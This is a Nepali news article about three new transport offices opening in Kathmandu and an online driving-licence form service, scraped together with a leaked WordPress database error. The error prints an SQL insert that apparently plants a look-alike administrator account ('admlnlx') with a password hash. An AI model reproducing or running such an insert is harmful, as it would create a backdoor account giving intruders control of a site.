WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bs5OxIV2rVn6ejo89DjNQM9j/c02aU1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:36:07', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १० –
यसै महिनाभित्र काठमाडौंका थप तीन ठाउँमा यातायात कार्यालय खुल्ने भएको छ । कलंकी, चावहिल र सल्लाघारीमा यातायात कार्यालय खोल्ने तयारी अन्तिम चरणमा पुगेको छ ।
आइतबार यातायात कार्यालय एकान्तकुनामा लाइसेन्सका लागि अनलाइन फारम सेवाको शुभारम्भ गर्दै भौतिक पूर्वाधार तथा यातायातमन्त्री रमेश लेखकले भने, ‘घर भाडा सम्झौता भइसक्यो । कार्यालय व्यवस्थापनको काम चलिरहेको छ ।’
उनका अनुसारकलंकी कार्यालयमा १७ गतेबाट सेवा सुरु हुनेछ भने चावहिल र सल्लाघारीमा २७ बाट कार्यालय खुल्नेछ ।
थपिएका तीनवटै कार्यालयमा तत्काल अनलाइन फारम सेवा दिइने मन्त्री लेखकले बताए । मन्त्री लेखकले शुभारम्भ गरेको लाइसेन्सका लागि अनलाइन फारम सेवा सोमबारबाट औपचारिक रुपमा सुरु हुनेछ ।
तर, हाल यो दुई पाङ्ग्रे सवारीका लागि मात्र छ भने अनलाइन फारम सुरुमा एकान्तकुना कार्यालयका लागि मात्र लागू हुनेछ ।
उनले अबको केही समयभित्रै चार पांग्रेसवारी लाइसेन्सको फारम पनि अनलाइनबाटै भर्ने सुविधा दिने बताए ।
‘विभागलाई पर्ने अप्ठेरो म फुकाउँछु । योजना बनाएर स्तरीय सेवा दिनुपर्यो’ मन्त्री लेखकले भने,’हामीले प्रयत्न गरेपछि गर्न नसकिने भन्ने हुँदैन ।’